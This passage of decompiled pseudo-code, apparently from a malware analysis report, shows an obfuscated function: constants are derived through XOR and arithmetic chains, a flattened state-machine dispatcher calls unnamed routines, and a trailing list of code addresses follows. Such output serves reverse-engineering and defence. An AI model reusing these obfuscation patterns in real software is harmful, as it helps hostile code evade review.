                                                                                                                                                                                      				_v492 = _v492 + 0xfffffdd7;
                                                                                                                                                                                      				_v492 = _v492 * 0x50;
                                                                                                                                                                                      				_v492 = _v492 + 0xffff20fb;
                                                                                                                                                                                      				_v492 = _v492 ^ 0x2ca84503;
                                                                                                                                                                                      				_v352 = 0xb8f26f;
                                                                                                                                                                                      				_v352 = _v352 + 0x7ba8;
                                                                                                                                                                                      				_v352 = _v352 >> 6;
                                                                                                                                                                                      				_v352 = _v352 ^ 0x000b39f4;
                                                                                                                                                                                      				_v536 = 0x43cba6;
                                                                                                                                                                                      				_v536 = _v536 + 0xffff968b;
                                                                                                                                                                                      				_v536 = _v536 + 0xd20d;
                                                                                                                                                                                      				_v536 = _v536 << 1;
                                                                                                                                                                                      				_v536 = _v536 ^ 0x00836c5a;
                                                                                                                                                                                      				_v480 = 0x5e5d26;
                                                                                                                                                                                      				_v480 = _v480 + 0xffff687f;
                                                                                                                                                                                      				_v480 = _v480 ^ 0xddceb38b;
                                                                                                                                                                                      				_v480 = _v480 | 0x4dfd19e7;
                                                                                                                                                                                      				_v480 = _v480 ^ 0xddf7d232;
                                                                                                                                                                                      				_v236 = 0x7bb6bb;
                                                                                                                                                                                      				_v236 = _v236 << 0xa;
                                                                                                                                                                                      				_v236 = _v236 ^ 0xeeda4ae1;
                                                                                                                                                                                      				_v332 = 0xdbd532;
                                                                                                                                                                                      				_v332 = _v332 / _t1260;
                                                                                                                                                                                      				_v332 = _v332 + 0x6f41;
                                                                                                                                                                                      				_v332 = _v332 ^ 0x000f8c93;
                                                                                                                                                                                      				_v172 = 0x169d2;
                                                                                                                                                                                      				_v172 = _v172 << 1;
                                                                                                                                                                                      				_v172 = _v172 ^ 0x000bb064;
                                                                                                                                                                                      				_v228 = 0xc8a619;
                                                                                                                                                                                      				_t1261 = 0x51;
                                                                                                                                                                                      				_v228 = _v228 / _t1261;
                                                                                                                                                                                      				_v228 = _v228 ^ 0x000b224e;
                                                                                                                                                                                      				_v296 = 0xf4bcd8;
                                                                                                                                                                                      				_v296 = _v296 + 0xffffb281;
                                                                                                                                                                                      				_v296 = _v296 + 0xffff612f;
                                                                                                                                                                                      				_v296 = _v296 ^ 0x00ff5067;
                                                                                                                                                                                      				_v428 = 0x3c482c;
                                                                                                                                                                                      				_t832 =  &_v428; // 0x3c482c
                                                                                                                                                                                      				_v428 =  *_t832 * 0x2f;
                                                                                                                                                                                      				_v428 = _v428 + 0xffff6f9d;
                                                                                                                                                                                      				_v428 = _v428 | 0x8da675c7;
                                                                                                                                                                                      				_v428 = _v428 ^ 0x8fb5367e;
                                                                                                                                                                                      				_v164 = 0x73eaaf;
                                                                                                                                                                                      				_t1262 = 0x7b;
                                                                                                                                                                                      				_v164 = _v164 / _t1262;
                                                                                                                                                                                      				_v164 = _v164 ^ 0x013494eb;
                                                                                                                                                                                      				_v508 = 0xaea7a7;
                                                                                                                                                                                      				_v508 = _v508 + 0xffffad05;
                                                                                                                                                                                      				_v508 = _v508 | 0x2fb01782;
                                                                                                                                                                                      				_v508 = _v508 + 0xdf59;
                                                                                                                                                                                      				_v508 = _v508 ^ 0x2fbf1017;
                                                                                                                                                                                      				_v348 = 0x6a0001;
                                                                                                                                                                                      				_v348 = _v348 >> 8;
                                                                                                                                                                                      				_t1263 = 0x1e;
                                                                                                                                                                                      				_t1350 = _v292;
                                                                                                                                                                                      				_t1240 = _v292;
                                                                                                                                                                                      				_v348 = _v348 * 0x56;
                                                                                                                                                                                      				_v348 = _v348 ^ 0x00239c01;
                                                                                                                                                                                      				_v312 = 0x718fb1;
                                                                                                                                                                                      				_v312 = _v312 ^ 0x0a0922bb;
                                                                                                                                                                                      				_v312 = _v312 + 0xffff9da2;
                                                                                                                                                                                      				_v312 = _v312 ^ 0x0a78450c;
                                                                                                                                                                                      				_v184 = 0xbc43da;
                                                                                                                                                                                      				_v184 = _v184 | 0x65dbfe97;
                                                                                                                                                                                      				_v184 = _v184 ^ 0x65ffe09f;
                                                                                                                                                                                      				_v584 = 0x19ebc;
                                                                                                                                                                                      				_v584 = _v584 << 0xd;
                                                                                                                                                                                      				_v584 = _v584 * 0x6e;
                                                                                                                                                                                      				_v584 = _v584 | 0x20e1f71e;
                                                                                                                                                                                      				_v584 = _v584 ^ 0x66f44cbe;
                                                                                                                                                                                      				_v556 = 0x102963;
                                                                                                                                                                                      				_v556 = _v556 << 1;
                                                                                                                                                                                      				_v556 = _v556 + 0xffff27ea;
                                                                                                                                                                                      				_v556 = _v556 >> 8;
                                                                                                                                                                                      				_v556 = _v556 ^ 0x000da4da;
                                                                                                                                                                                      				_v412 = 0x8d39f9;
                                                                                                                                                                                      				_v412 = _v412 ^ 0x304d710d;
                                                                                                                                                                                      				_v412 = _v412 + 0x1676;
                                                                                                                                                                                      				_v412 = _v412 ^ 0x30ceab4a;
                                                                                                                                                                                      				_v548 = 0xb36dd5;
                                                                                                                                                                                      				_v548 = _v548 << 1;
                                                                                                                                                                                      				_v548 = _v548 + 0xffff009c;
                                                                                                                                                                                      				_v548 = _v548 ^ 0xc2df1814;
                                                                                                                                                                                      				_v548 = _v548 ^ 0xc3b43072;
                                                                                                                                                                                      				_v400 = 0x83e780;
                                                                                                                                                                                      				_v400 = _v400 / _t1263;
                                                                                                                                                                                      				_v400 = _v400 + 0xffff5fe0;
                                                                                                                                                                                      				_v400 = _v400 ^ 0x0003b045;
                                                                                                                                                                                      				_v392 = 0xcc2700;
                                                                                                                                                                                      				_v392 = _v392 + 0x6318;
                                                                                                                                                                                      				_t1264 = 0x50;
                                                                                                                                                                                      				_v392 = _v392 / _t1264;
                                                                                                                                                                                      				_v392 = _v392 ^ 0x000264e6;
                                                                                                                                                                                      				goto L1;
                                                                                                                                                                                      				do {
                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                      						L1:
                                                                                                                                                                                      						_t1388 = _t1353 - 0x9625c26;
                                                                                                                                                                                      						if(_t1388 > 0) {
                                                                                                                                                                                      							break;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if(_t1388 == 0) {
                                                                                                                                                                                      							_t1161 = E003E645F( &_v92, _v596, _v424, _v156, _v420,  &_v108);
                                                                                                                                                                                      							_t1383 = _t1383 + 0x10;
                                                                                                                                                                                      							asm("sbb esi, esi");
                                                                                                                                                                                      							_t1353 = ( ~_t1161 & 0xf38ca8a6) + 0xf16eb84;
                                                                                                                                                                                      							continue;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t1389 = _t1353 - 0x5085634;
                                                                                                                                                                                      						if(_t1389 > 0) {
                                                                                                                                                                                      							__eflags = _t1353 - 0x743bbd3;
                                                                                                                                                                                      							if(__eflags > 0) {
                                                                                                                                                                                      								__eflags = _t1353 - 0x7d9812c;
                                                                                                                                                                                      								if(_t1353 == 0x7d9812c) {
                                                                                                                                                                                      									__eflags = E003EE7DA();
                                                                                                                                                                                      									if(__eflags == 0) {
                                                                                                                                                                                      										_t1165 = E003E902C();
                                                                                                                                                                                      										asm("sbb esi, esi");
                                                                                                                                                                                      										_t1353 = ( ~_t1165 & 0xfa09740f) + 0xc68510e;
                                                                                                                                                                                      										continue;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t1167 = E003E902C();
                                                                                                                                                                                      									asm("sbb esi, esi");
                                                                                                                                                                                      									_t1369 =  ~_t1167 & 0xfa79cff4;
                                                                                                                                                                                      									L53:
                                                                                                                                                                                      									_t1353 = _t1369 + 0xd96f0c7;
                                                                                                                                                                                      									continue;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eflags = _t1353 - 0x810c0bb;
                                                                                                                                                                                      								if(_t1353 == 0x810c0bb) {
                                                                                                                                                                                      									_t1167 = E003D1DF9();
                                                                                                                                                                                      									asm("sbb esi, esi");
                                                                                                                                                                                      									_t1369 =  ~_t1167 & 0xf771656d;
                                                                                                                                                                                      									__eflags = _t1369;
                                                                                                                                                                                      									goto L53;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eflags = _t1353 - 0x8d7d650;
                                                                                                                                                                                      								if(_t1353 == 0x8d7d650) {
                                                                                                                                                                                      									_t1167 = E003EC772();
                                                                                                                                                                                      									L114:
                                                                                                                                                                                      									return _t1167;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eflags = _t1353 - 0x94a2b75;
                                                                                                                                                                                      								if(_t1353 != 0x94a2b75) {
                                                                                                                                                                                      									goto L109;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t1278 = _v364;
                                                                                                                                                                                      								_t1167 = E003DF699(_t1278, _v100, _v472, _v144, _v220);
                                                                                                                                                                                      								_t1383 = _t1383 + 0xc;
                                                                                                                                                                                      								_t1353 = 0xf16eb84;
                                                                                                                                                                                      								continue;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                                                      								_t1167 = _v164;
                                                                                                                                                                                      								_t1353 = 0xc313b49;
                                                                                                                                                                                      								_v76 = _t1167;
                                                                                                                                                                                      								continue;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t1353 - 0x50ec05a;
                                                                                                                                                                                      							if(_t1353 == 0x50ec05a) {
                                                                                                                                                                                      								_t1167 = E003D2176();
                                                                                                                                                                                      								_t1353 = 0x24c641b;
                                                                                                                                                                                      								continue;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t1353 - 0x5c746ce;
                                                                                                                                                                                      							if(_t1353 == 0x5c746ce) {
                                                                                                                                                                                      								_t1167 = E003E2DE9(_t1278);
                                                                                                                                                                                      								goto L114;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t1353 - 0x671c51d;
                                                                                                                                                                                      							if(_t1353 == 0x671c51d) {
                                                                                                                                                                                      								_t1167 = E003F2D4F();
                                                                                                                                                                                      								_t1353 = 0xc68510e;
                                                                                                                                                                                      								continue;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t1353 - 0x6e9da8a;
                                                                                                                                                                                      							if(_t1353 != 0x6e9da8a) {
                                                                                                                                                                                      								goto L109;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t1167 = E003E56A9();
                                                                                                                                                                                      							__eflags = _t1167;
                                                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                                                      								goto L114;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t1353 = 0xbae568e;
                                                                                                                                                                                      							continue;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if(_t1389 == 0) {
                                                                                                                                                                                      							_t1167 = E003DB12E(_v436, _v292, _v160, _v304);
                                                                                                                                                                                      							goto L114;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t1390 = _t1353 - 0x411ce06;
                                                                                                                                                                                      						if(_t1390 > 0) {
                                                                                                                                                                                      							__eflags = _t1353 - 0x414ffd1;
                                                                                                                                                                                      							if(_t1353 == 0x414ffd1) {
                                                                                                                                                                                      								__eflags = _t1350 - _v244;
                                                                                                                                                                                      								if(_t1350 == _v244) {
                                                                                                                                                                                      									L35:
                                                                                                                                                                                      									_t1353 = _t1240;
                                                                                                                                                                                      									goto L109;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t1167 = E003F37B6(_v480, _v236, _v332, _v172, E003ED4AE(), _t1350);
                                                                                                                                                                                      								_t1383 = _t1383 + 0x10;
                                                                                                                                                                                      								__eflags = _t1167 - _v132;
                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                      									_t1167 = E003E6B91();
                                                                                                                                                                                      									goto L35;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t1353 = 0x5c746ce;
                                                                                                                                                                                      								continue;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t1353 - 0x4c34997;
                                                                                                                                                                                      							if(_t1353 == 0x4c34997) {
                                                                                                                                                                                      								_t1167 = E003D635F();
                                                                                                                                                                                      								_v72 = _t1167;
                                                                                                                                                                                      								_t1353 = 0x411ce06;
                                                                                                                                                                                      								continue;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t1353 - 0x4c43855;
                                                                                                                                                                                      							if(_t1353 == 0x4c43855) {
                                                                                                                                                                                      								_t1167 = E003E3ABE();
                                                                                                                                                                                      								_t1353 = 0xbc300ba;
                                                                                                                                                                                      								continue;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t1353 - 0x4ea5811;
                                                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                                                      								goto L109;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t1167 = E003F0BF1(__eflags);
                                                                                                                                                                                      							__eflags = _t1167;
                                                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                                                      								goto L114;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t1353 = 0x15a9200;
                                                                                                                                                                                      							continue;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if(_t1390 == 0) {
                                                                                                                                                                                      							_t1167 = E003F27E2();
                                                                                                                                                                                      							_v44 = _t1167;
                                                                                                                                                                                      							_t1353 = 0x743bbd3;
                                                                                                                                                                                      							continue;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if(_t1353 == 0x15a9200) {
                                                                                                                                                                                      							_t1167 = E003DF022();
                                                                                                                                                                                      							_t1353 = 0xf17c585;
                                                                                                                                                                                      							continue;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if(_t1353 == 0x24c641b) {
                                                                                                                                                                                      							_v116 = E003E8518(_v316, _v404, __eflags,  &_v112, _v568, 0x3d1000);
                                                                                                                                                                                      							_v124 = E003E8518(_v268, _v496, __eflags,  &_v120, _v188, 0x3d1060);
                                                                                                                                                                                      							_t1197 = E003D5DC3(_v396,  &_v116, _v560,  &_v124);
                                                                                                                                                                                      							asm("sbb esi, esi");
                                                                                                                                                                                      							_t1353 = ( ~_t1197 & 0x01f8303b) + 0xda639e1;
                                                                                                                                                                                      							E003E2EED(_v128, _v552, _v432, _v124);
                                                                                                                                                                                      							_t1167 = E003E2EED(_v488, _v388, _v340, _v116);
                                                                                                                                                                                      							_t1383 = _t1383 + 0x30;
                                                                                                                                                                                      							goto L109;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if(_t1353 == 0x2a3942a) {
                                                                                                                                                                                      							_t1167 = E003E4DC5(_v276, _v464, _v348, E003ED4AE(),  &_v108,  &_v100, _v576);
                                                                                                                                                                                      							_t1383 = _t1383 + 0x14;
                                                                                                                                                                                      							asm("sbb esi, esi");
                                                                                                                                                                                      							_t1353 = ( ~_t1167 & 0x000968d2) + 0x2a3942a;
                                                                                                                                                                                      							continue;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if(_t1353 != 0x2acfcfc) {
                                                                                                                                                                                      							goto L109;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t1204 = E003D597D( &_v40, _v260,  &_v100, _v416);
                                                                                                                                                                                      						_pop(_t1278);
                                                                                                                                                                                      						if(_t1204 != 0) {
                                                                                                                                                                                      							_t1167 = _v8;
                                                                                                                                                                                      							__eflags = _t1167 - 8;
                                                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                                                      								__eflags = _t1167;
                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                      									L18:
                                                                                                                                                                                      									_t1353 = 0xabc2d6d;
                                                                                                                                                                                      									continue;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eflags = _t1167 - 1;
                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                      									L13:
                                                                                                                                                                                      									_t1353 = 0x94a2b75;
                                                                                                                                                                                      									continue;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								goto L18;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t1353 = 0x8d7d650;
                                                                                                                                                                                      							continue;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_push(_t1278);
                                                                                                                                                                                      						_push(_v584);
                                                                                                                                                                                      						_push(_t1278);
                                                                                                                                                                                      						_t1278 = _v412;
                                                                                                                                                                                      						_t1167 = E003E2CCF(_t1278, _t1278);
                                                                                                                                                                                      						_t1383 = _t1383 + 0x10;
                                                                                                                                                                                      						_t1350 = _t1167;
                                                                                                                                                                                      						_t1240 = 0xe75263b;
                                                                                                                                                                                      						goto L13;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					__eflags = _t1353 - 0xc68510e;
                                                                                                                                                                                      					if(__eflags > 0) {
                                                                                                                                                                                      						__eflags = _t1353 - 0xf17c585;
                                                                                                                                                                                      						if(__eflags > 0) {
                                                                                                                                                                                      							__eflags = _t1353 - 0xf2d358e;
                                                                                                                                                                                      							if(_t1353 == 0xf2d358e) {
                                                                                                                                                                                      								_t1157 = E003E902C();
                                                                                                                                                                                      								__eflags = _t1157;
                                                                                                                                                                                      								if(_t1157 == 0) {
                                                                                                                                                                                      									_t1167 = E003D3E3B();
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t1353 = 0x94a2b75;
                                                                                                                                                                                      								goto L109;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t1353 - 0xf885e3b;
                                                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                                                      								_v92 = E003D7A75();
                                                                                                                                                                                      								_t1353 = 0x4c34997;
                                                                                                                                                                                      								goto L1;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t1353 - 0xf9e6a1c;
                                                                                                                                                                                      							if(_t1353 != 0xf9e6a1c) {
                                                                                                                                                                                      								goto L109;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							E003D60BA();
                                                                                                                                                                                      							_t1240 = 0xc2716a1;
                                                                                                                                                                                      							_push(_t1278);
                                                                                                                                                                                      							_push(_v312);
                                                                                                                                                                                      							_push(_t1278);
                                                                                                                                                                                      							_t1278 = _v184;
                                                                                                                                                                                      							_t1167 = E003E2CCF(_t1278, _t1278);
                                                                                                                                                                                      							_t1383 = _t1383 + 0x10;
                                                                                                                                                                                      							_t1350 = _t1167;
                                                                                                                                                                                      							L95:
                                                                                                                                                                                      							_t1353 = 0x414ffd1;
                                                                                                                                                                                      							goto L1;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                                                      							_t1167 = E003D8112();
                                                                                                                                                                                      							__eflags = _t1167;
                                                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                                                      								goto L114;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t1353 = 0xa4cd57e;
                                                                                                                                                                                      							goto L1;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t1353 - 0xce7cb5b;
                                                                                                                                                                                      						if(_t1353 == 0xce7cb5b) {
                                                                                                                                                                                      							E003E89DA();
                                                                                                                                                                                      							_t1167 = E003E902C();
                                                                                                                                                                                      							asm("sbb esi, esi");
                                                                                                                                                                                      							_t1353 = ( ~_t1167 & 0xf901379b) + 0xbc300ba;
                                                                                                                                                                                      							goto L1;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t1353 - 0xd96f0c7;
                                                                                                                                                                                      						if(_t1353 == 0xd96f0c7) {
                                                                                                                                                                                      							_t1167 = E003EAEAE();
                                                                                                                                                                                      							_t1353 = 0x50ec05a;
                                                                                                                                                                                      							goto L1;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t1353 - 0xe75263b;
                                                                                                                                                                                      						if(_t1353 == 0xe75263b) {
                                                                                                                                                                                      							_t1167 = E003E75E9(_v344, _v484,  &_v52);
                                                                                                                                                                                      							_pop(_t1278);
                                                                                                                                                                                      							_t1353 = 0x9625c26;
                                                                                                                                                                                      							goto L1;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t1353 - 0xf16eb84;
                                                                                                                                                                                      						if(_t1353 != 0xf16eb84) {
                                                                                                                                                                                      							goto L109;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t1278 = _v224;
                                                                                                                                                                                      						_t1167 = E003DF699(_t1278, _v108, _v232, _v492, _v352);
                                                                                                                                                                                      						_t1383 = _t1383 + 0xc;
                                                                                                                                                                                      						goto L95;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                                                      						_t1167 = E003EC145();
                                                                                                                                                                                      						_t1353 = 0xb042b16;
                                                                                                                                                                                      						goto L1;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					__eflags = _t1353 - 0xbae568e;
                                                                                                                                                                                      					if(__eflags > 0) {
                                                                                                                                                                                      						__eflags = _t1353 - 0xbc300ba;
                                                                                                                                                                                      						if(_t1353 == 0xbc300ba) {
                                                                                                                                                                                      							_t1167 = E003ECE94();
                                                                                                                                                                                      							_t1353 = 0x5085634;
                                                                                                                                                                                      							goto L1;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t1353 - 0xc2716a1;
                                                                                                                                                                                      						if(_t1353 == 0xc2716a1) {
                                                                                                                                                                                      							_v68 = E003E5B73();
                                                                                                                                                                                      							_t1167 = E003E4268(_v248, _v256, _t1216);
                                                                                                                                                                                      							_pop(_t1278);
                                                                                                                                                                                      							_v64 = _t1167;
                                                                                                                                                                                      							_t1353 = 0xf885e3b;
                                                                                                                                                                                      							goto L1;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t1353 - 0xc313b49;
                                                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                                                      							_t1167 = _v508;
                                                                                                                                                                                      							_t1353 = 0xe75263b;
                                                                                                                                                                                      							_v88 = _t1167;
                                                                                                                                                                                      							goto L1;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t1353 - 0xc58f524;
                                                                                                                                                                                      						if(_t1353 != 0xc58f524) {
                                                                                                                                                                                      							goto L109;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t1167 = E003D8D59();
                                                                                                                                                                                      						__eflags = _t1167;
                                                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                                                      							goto L114;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t1353 = 0xce7cb5b;
                                                                                                                                                                                      						goto L1;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                                                      						_t1167 = E003D196D();
                                                                                                                                                                                      						asm("sbb esi, esi");
                                                                                                                                                                                      						_t1353 = ( ~_t1167 & 0x032aa9ea) + 0x7d9812c;
                                                                                                                                                                                      						goto L1;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					__eflags = _t1353 - 0xa4cd57e;
                                                                                                                                                                                      					if(_t1353 == 0xa4cd57e) {
                                                                                                                                                                                      						_t1167 = E003D60BA();
                                                                                                                                                                                      						__eflags = _t1167;
                                                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                                                      							goto L114;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t1353 = 0x6e9da8a;
                                                                                                                                                                                      						goto L1;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					__eflags = _t1353 - 0xaa07b46;
                                                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                                                      						_t1353 = 0x4ea5811;
                                                                                                                                                                                      						goto L1;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					__eflags = _t1353 - 0xabc2d6d;
                                                                                                                                                                                      					if(_t1353 == 0xabc2d6d) {
                                                                                                                                                                                      						_t1167 = E003D39C3(_v136,  &_v32);
                                                                                                                                                                                      						_pop(_t1278);
                                                                                                                                                                                      						__eflags = _t1167;
                                                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                                                      							_t1167 = _v8;
                                                                                                                                                                                      							__eflags = _t1167;
                                                                                                                                                                                      							if(_t1167 == 0) {
                                                                                                                                                                                      								_push(_t1278);
                                                                                                                                                                                      								_push(_v556);
                                                                                                                                                                                      								_push(_t1278);
                                                                                                                                                                                      								_t1278 = _v548;
                                                                                                                                                                                      								_t1350 = E003E2CCF(_t1278, _t1278);
                                                                                                                                                                                      								_t1383 = _t1383 + 0x10;
                                                                                                                                                                                      								_t1167 = _v8;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t1167 - 1;
                                                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                                                      								_push(_t1278);
                                                                                                                                                                                      								_push(_v400);
                                                                                                                                                                                      								_push(_t1278);
                                                                                                                                                                                      								_t1278 = _v392;
                                                                                                                                                                                      								_t1167 = E003E2CCF(_t1278, _t1278);
                                                                                                                                                                                      								_t1383 = _t1383 + 0x10;
                                                                                                                                                                                      								_t1350 = _t1167;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t1350 = _v196;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t1240 = 0xe75263b;
                                                                                                                                                                                      						_t1353 = 0xf2d358e;
                                                                                                                                                                                      						goto L1;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					__eflags = _t1353 - 0xb042b16;
                                                                                                                                                                                      					if(_t1353 != 0xb042b16) {
                                                                                                                                                                                      						goto L109;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t1167 = E003EBA18();
                                                                                                                                                                                      					_t1353 = 0xc58f524;
                                                                                                                                                                                      					goto L1;
                                                                                                                                                                                      					L109:
                                                                                                                                                                                      					__eflags = _t1353 - 0xda639e1;
                                                                                                                                                                                      				} while (__eflags != 0);
                                                                                                                                                                                      				goto L114;
                                                                                                                                                                                      			}


















































































































































































                                                                                                                                                                                      0x003e91fd
                                                                                                                                                                                      0x003e9207
                                                                                                                                                                                      0x003e9214
                                                                                                                                                                                      0x003e921f
                                                                                                                                                                                      0x003e922a
                                                                                                                                                                                      0x003e9235
                                                                                                                                                                                      0x003e9240
                                                                                                                                                                                      0x003e924b
                                                                                                                                                                                      0x003e9256
                                                                                                                                                                                      0x003e925d
                                                                                                                                                                                      0x003e9268
                                                                                                                                                                                      0x003e9270
                                                                                                                                                                                      0x003e9278
                                                                                                                                                                                      0x003e9280
                                                                                                                                                                                      0x003e9288
                                                                                                                                                                                      0x003e9290
                                                                                                                                                                                      0x003e929b
                                                                                                                                                                                      0x003e92a6
                                                                                                                                                                                      0x003e92b1
                                                                                                                                                                                      0x003e92bc
                                                                                                                                                                                      0x003e92c7
                                                                                                                                                                                      0x003e92d2
                                                                                                                                                                                      0x003e92dd
                                                                                                                                                                                      0x003e92e8
                                                                                                                                                                                      0x003e92f3
                                                                                                                                                                                      0x003e92fe
                                                                                                                                                                                      0x003e9309
                                                                                                                                                                                      0x003e9311
                                                                                                                                                                                      0x003e931c
                                                                                                                                                                                      0x003e932f
                                                                                                                                                                                      0x003e9336
                                                                                                                                                                                      0x003e9344
                                                                                                                                                                                      0x003e9349
                                                                                                                                                                                      0x003e9352
                                                                                                                                                                                      0x003e935d
                                                                                                                                                                                      0x003e9369
                                                                                                                                                                                      0x003e936c
                                                                                                                                                                                      0x003e9370
                                                                                                                                                                                      0x003e9378
                                                                                                                                                                                      0x003e937d
                                                                                                                                                                                      0x003e9385
                                                                                                                                                                                      0x003e938d
                                                                                                                                                                                      0x003e9392
                                                                                                                                                                                      0x003e939a
                                                                                                                                                                                      0x003e93a2
                                                                                                                                                                                      0x003e93aa
                                                                                                                                                                                      0x003e93b5
                                                                                                                                                                                      0x003e93c8
                                                                                                                                                                                      0x003e93cf
                                                                                                                                                                                      0x003e93da
                                                                                                                                                                                      0x003e93e5
                                                                                                                                                                                      0x003e93ed
                                                                                                                                                                                      0x003e93f8
                                                                                                                                                                                      0x003e9400
                                                                                                                                                                                      0x003e9405
                                                                                                                                                                                      0x003e940d
                                                                                                                                                                                      0x003e9415
                                                                                                                                                                                      0x003e941d
                                                                                                                                                                                      0x003e9425
                                                                                                                                                                                      0x003e942a
                                                                                                                                                                                      0x003e9437
                                                                                                                                                                                      0x003e943b
                                                                                                                                                                                      0x003e9443
                                                                                                                                                                                      0x003e944e
                                                                                                                                                                                      0x003e9459
                                                                                                                                                                                      0x003e9464
                                                                                                                                                                                      0x003e946f
                                                                                                                                                                                      0x003e9486
                                                                                                                                                                                      0x003e9489
                                                                                                                                                                                      0x003e9490
                                                                                                                                                                                      0x003e949b
                                                                                                                                                                                      0x003e94a6
                                                                                                                                                                                      0x003e94b9
                                                                                                                                                                                      0x003e94c0
                                                                                                                                                                                      0x003e94cb
                                                                                                                                                                                      0x003e94d6
                                                                                                                                                                                      0x003e94de
                                                                                                                                                                                      0x003e94e6
                                                                                                                                                                                      0x003e94f1
                                                                                                                                                                                      0x003e94fc
                                                                                                                                                                                      0x003e9507
                                                                                                                                                                                      0x003e950f
                                                                                                                                                                                      0x003e951a
                                                                                                                                                                                      0x003e9530
                                                                                                                                                                                      0x003e9537
                                                                                                                                                                                      0x003e9542
                                                                                                                                                                                      0x003e9557
                                                                                                                                                                                      0x003e955a
                                                                                                                                                                                      0x003e9566
                                                                                                                                                                                      0x003e956a
                                                                                                                                                                                      0x003e9572
                                                                                                                                                                                      0x003e957d
                                                                                                                                                                                      0x003e9585
                                                                                                                                                                                      0x003e958c
                                                                                                                                                                                      0x003e9597
                                                                                                                                                                                      0x003e95aa
                                                                                                                                                                                      0x003e95ab
                                                                                                                                                                                      0x003e95b2
                                                                                                                                                                                      0x003e95bd
                                                                                                                                                                                      0x003e95c8
                                                                                                                                                                                      0x003e95d3
                                                                                                                                                                                      0x003e95db
                                                                                                                                                                                      0x003e95e6
                                                                                                                                                                                      0x003e95f1
                                                                                                                                                                                      0x003e95fc
                                                                                                                                                                                      0x003e9604
                                                                                                                                                                                      0x003e960f
                                                                                                                                                                                      0x003e961a
                                                                                                                                                                                      0x003e9625
                                                                                                                                                                                      0x003e9630
                                                                                                                                                                                      0x003e963b
                                                                                                                                                                                      0x003e9646
                                                                                                                                                                                      0x003e9654
